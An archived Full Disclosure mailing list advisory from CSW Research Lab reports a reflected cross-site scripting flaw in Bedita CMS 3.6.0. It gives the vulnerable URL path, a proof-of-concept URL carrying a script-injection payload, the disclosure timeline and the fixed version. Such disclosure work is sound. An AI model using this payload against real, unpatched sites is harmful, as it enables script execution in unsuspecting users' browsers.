[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Bedita 3.6.0 – Cross-Site Scripting Vulnerability

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Bedita 3.6.0 – Cross-Site Scripting Vulnerability
From: CSW Research Lab <disclose@xxxxxxxxxxxxxxxxxxxxxx>
Date: Sat, 12 Dec 2015 20:24:41 +0530

================================================================
Bedita 3.6.0 – Cross-Site Scripting Vulnerability
================================================================

Information
**********************

Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 3.6.0
Severity: Medium
Author – Arjun Basnet
CVE-ID: N/A
Homepage: http://www.bedita.com/

Description
***********************

Bedita is prone to URI based Cross-site scripting vulnerability because it
fails to sanitize user-supplied input. An attacker may leverage this issue
to execute arbitrary script code
in the browser of an unsuspecting user of the affected site.

Proof of Concept URL
***************************

[+] http://localhost
<http://localhost/ocportal/data/emoticons.php?field_name=post&keep_session=1>
/bedita/beditaapp/pages/showObjects/2/0/0/leafs"><script>alert(1);</script>

Affected URL
*****************

[+] http://localhost
<http://localhost/ocportal/data/emoticons.php?field_name=post&keep_session=1>
/bedita/beditaapp/pages/showObjects/2/0/0/leafs

Payload
=======================

"><script>alert(1);</script>

Advisory Information:
================================================
Bedita CMS XSS Vulnerability


Severity Level:
=========================================================
Medium

Description:
==========================================================

Vulnerable Product:

[+] Bedita 3.6.0

Advisory Timeline
************************

14-Oct-2015- Reported
14-Oct-2015- Vendor Response
11-Dec-2015- Vendor Released Fixed version
12-Dec-2015- Public disclosed

Fixed Version:
*****************

[+]  Bedita 3.7.0 (http://www.bedita.com/home-be/be-download-2)


Reference
*****************

[+] https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)


Credits & Authors
************************
Arjun Basnet from Cyber Security Works Pvt. Ltd. (
http://cybersecurityworks.com)

-- 
----------
Cheers !!!

Team CSW Research Lab <http://www.cybersecurityworks.com>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability
Next by Date: [FD] Symphony 2.6.3 – Multiple Persistent Cross-Site Scripting Vulnerabilities
Previous by thread: [FD] OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability
Next by thread: [FD] Symphony 2.6.3 – Multiple Persistent Cross-Site Scripting Vulnerabilities
Index(es):
- Date
- Thread